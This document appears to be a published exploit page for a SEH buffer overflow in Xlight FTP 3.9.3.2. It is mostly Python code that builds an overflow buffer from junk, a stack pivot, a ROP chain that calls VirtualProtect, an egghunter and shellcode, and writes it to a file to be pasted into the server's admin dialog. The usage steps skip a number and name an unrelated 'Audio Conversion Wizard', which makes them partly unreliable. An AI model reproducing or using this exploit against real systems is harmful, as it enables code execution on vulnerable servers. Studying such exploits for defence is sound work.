Authored by Hejap Zairy

Xlight FTP version 3.9.3.2 SEH buffer overflow exploit with egghunter and ROP.

# Exploit Title: Xlight FTP v3.9.3.2 - Buffer Overflow (SEH Egghunter + ROP)
# Exploit Author: Hejap Zairy
# Date: 13.07.2022
# Software Link: http://www.xlightftpd.com/download/setup.exe
# Tested Version: v3.9.3.2(2022-1-5)
# Tested on: Windows 10 64bit

# 1.- Run the Python script: 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Audio Conversion Wizard and press Enter Code
# 5.- Click 'Server ip' -> 'General' -> 'Advanced' -> 'Execute a program after user logged in' -> 'Setup'
# 6.- Crashed


# Author Code By Hejap Zairy
#!/usr/bin/env python
# Author Hejap Zairy
#!/usr/bin/env python
import struct


##================================================================================
## 2022-03-12 16:54:06
##================================================================================
##-----------------------------------------------------------------------------------------------------------------------------------------
## Module info :
##-----------------------------------------------------------------------------------------------------------------------------------------
## Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
##-----------------------------------------------------------------------------------------------------------------------------------------
## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True | True | True | False | True | 10.0.17763.1 [SHLWAPI.dll] (C:WindowsSystem32SHLWAPI.dll)
## 0x76970000 | 0x76a93000 | 0x00123000 | True | True | True | False | True | 10.0.17763.1490 [ucrtbase.dll] (C:WindowsSystem32ucrtbase.dll)
## 0x766a0000 | 0x766bc000 | 0x0001c000 | True | True | True | False | True | 10.0.17763.1075 [profapi.dll] (C:WindowsSystem32profapi.dll)
## 0x76340000 | 0x763c0000 | 0x00080000 | True | True | True | False | True | 10.0.17763.1 [msvcp_win.dll] (C:WindowsSystem32msvcp_win.dll)
## 0x75680000 | 0x757ea000 | 0x0016a000 | True | True | True | False | True | 10.0.17763.1879 [gdi32full.dll] (C:WindowsSystem32gdi32full.dll)
## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True | True | True | False | True | 10.0.17763.1 [CRYPT32.dll] (C:WindowsSystem32CRYPT32.dll)
## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True | True | True | False | True | 10.0.17763.1 [kernel.appcore.dll] (C:WindowsSystem32kernel.appcore.dll)
## 0x00400000 | 0x006d5000 | 0x002d5000 | False | False | False | False | False | 3.9.3.2 [xlight.exe] (C:UsersTarnishedDesktopXlightxlight.exe)
## 0x74870000 | 0x74909000 | 0x00099000 | True | True | True | False | True | 10.0.17763.1075 [ODBC32.dll] (C:WindowsSYSTEM32ODBC32.dll)
## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True | True | True | False | True | 10.0.17763.1 [apphelp.dll] (C:WindowsSYSTEM32apphelp.dll)
## 0x76280000 | 0x76297000 | 0x00017000 | True | True | True | False | True | 10.0.17763.1 [win32u.dll] (C:WindowsSystem32win32u.dll)
## 0x75c50000 | 0x761a6000 | 0x00556000 | True | True | True | False | True | 10.0.17763.1911 [SHELL32.dll] (C:WindowsSystem32SHELL32.dll)


##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:UsersTarnishedDesktopXlightxlight.exe)
# RopFunc syscall null
# Byte values the author records as unusable in the payload (the list is
# informational; nothing below reads it).
badchars = [0x00, 0x0A, 0x0D, 0x3A, 0xFF]

# Payload stage that the buffer assembly further down places after the
# 'h00ph00p' marker. Every element is an ASCII bytes literal exactly as it
# appears on this page (no escape sequences), and they are joined in order.
buf = b"".join((
    b"xd9xebx9bxd9x74x24xf4x31xd2xb2x77x31xc9",
    b"x64x8bx71x30x8bx76x0cx8bx76x1cx8bx46x08",
    b"x8bx7ex20x8bx36x38x4fx18x75xf3x59x01xd1",
    b"xffxe1x60x8bx6cx24x24x8bx45x3cx8bx54x28",
    b"x78x01xeax8bx4ax18x8bx5ax20x01xebxe3x34",
    b"x49x8bx34x8bx01xeex31xffx31xc0xfcxacx84",
    b"xc0x74x07xc1xcfx0dx01xc7xebxf4x3bx7cx24",
    b"x28x75xe1x8bx5ax24x01xebx66x8bx0cx4bx8b",
    b"x5ax1cx01xebx8bx04x8bx01xe8x89x44x24x1c",
    b"x61xc3xb2x08x29xd4x89xe5x89xc2x68x8ex4e",
    b"x0execx52xe8x9fxffxffxffx89x45x04xbbxef",
    b"xcexe0x60x87x1cx24x52xe8x8exffxffxffx89",
    b"x45x08x68x6cx6cx20x41x68x33x32x2ex64x68",
    b"x75x73x65x72x30xdbx88x5cx24x0ax89xe6x56",
    b"xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87x1c",
    b"x24x52xe8x5fxffxffxffx68x6fx78x58x20x68",
    b"x61x67x65x42x68x4dx65x73x73x31xdbx88x5c",
    b"x24x0ax89xe3x68x58x20x20x20x68x61x69x72",
    b"x79x68x61x70x20x5ax68x20x48x65x6ax68x30",
    b"x64x61x79x31xc9x88x4cx24x10x89xe1x31xd2",
    b"x52x53x51x52xffxd0x31xc0x50xffx55x08",
))


def Hejap_rop_chain():
    """Pack the gadget list below into one little-endian 32-bit sequence.

    Returns the concatenation of ``struct.pack('<I', value)`` for every entry
    of ``Hejap_gadgets``, in list order. The values are reproduced verbatim
    from the author's listing; every address entry is annotated by the author
    as ** REBASED ** ASLR, i.e. it is tied to the module layout of the
    snapshot recorded in the header table and is not a stable address.
    """

    Hejap_gadgets = [
    0x75c4f468, # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR
    0x7731c2a0, # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR
    0x75deb176, # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR
    #[---INFO:gadgets_to_set_ebp:---]
    0x7545eebb, # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR
    0x75ff2bdb, # & call esp [msvcp_win.dll] ** REBASED ** ASLR
    #[---INFO:gadgets_to_set_ebx:---]
    0x755d53b2, # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR
    0xfffffdff, # Value to negate, will become 0x00000201
    0x74d241d7, # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR
    0x75e72ff1, # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR
    #[---INFO:gadgets_to_set_edx:---]
    0x765a2dad, # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR
    0xffffffc0, # Value to negate, will become 0x00000040
    0x75297b65, # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR
    0x76a3b05a, # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR
    #[---INFO:gadgets_to_set_ecx:---]
    0x72bb29ef, # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR
    0x7774f16b, # &Writable location [ntdll.dll] ** REBASED ** ASLR
    #[---INFO:gadgets_to_set_edi:---]
    0x77275d3d, # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR
    0x75849686, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR
    #[---INFO:gadgets_to_set_eax:---]
    0x72bf2465, # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR
    0x90909090, # nop
    #[---INFO:pushad:---]
    0x76a37959, # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR
    ]
    # '<I' = little-endian unsigned 32-bit: one 4-byte chunk per list entry.
    return ''.join(struct.pack('<I', _) for _ in Hejap_gadgets)

# Egg-hunter stage: two ASCII literals concatenated into one str. As shown on
# this page neither literal contains escape sequences.
egg = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74"
egg+="xefxb8x68x30x30x70x8bxfaxafx75xeaxafx75xe7xffxe7"
rop_chain = Hejap_rop_chain()
# junk is sized so that stackpivot starts at index `offset` of the buffer
# (junk is offset-4 characters, nseh fills the 4 characters before it).
offset = 452
nseh = "x90" * 4
junk = "A" * (offset - len(nseh))
# The author attributes this pivot to xlight.exe; the module table in the
# header lists that binary with Rebase, SafeSEH, ASLR and NXCompat all False,
# which is the protection gap the whole chain depends on.
stackpivot = struct.pack('<I', 0x8e648b26 ) # POP ESP # POP EBP # RETN ** [xlight.exe
#seh = struct.pack('<I', 0x0019ccb8 ) null

# Final layout, in order: junk | nseh | stackpivot | rop_chain | 5 filler
# characters | egg | 'h00ph00p' marker | buf | trailing filler sized from
# 1000 minus len(egg) and len(stackpivot).
buffer = junk + nseh + stackpivot + rop_chain + "x90" * 5 + egg + 'h00ph00p' + buf + "x90" * (1000 - len(egg)-len(stackpivot))
# The file is written for manual use: per the steps in the header its content
# is pasted into the server's administration dialog ('Execute a program after
# user logged in'), so this appears to require access to the local admin UI
# rather than a network session — confirm against the header steps.
f = open("0day_hejap.txt", "w")
f.write(buffer)
f.close()


# Proof and Exploit:
https://i.imgur.com/jMURHQF.png
https://i.imgur.com/aw6hZo2.png
#Video
https://streamable.com/gmqz5x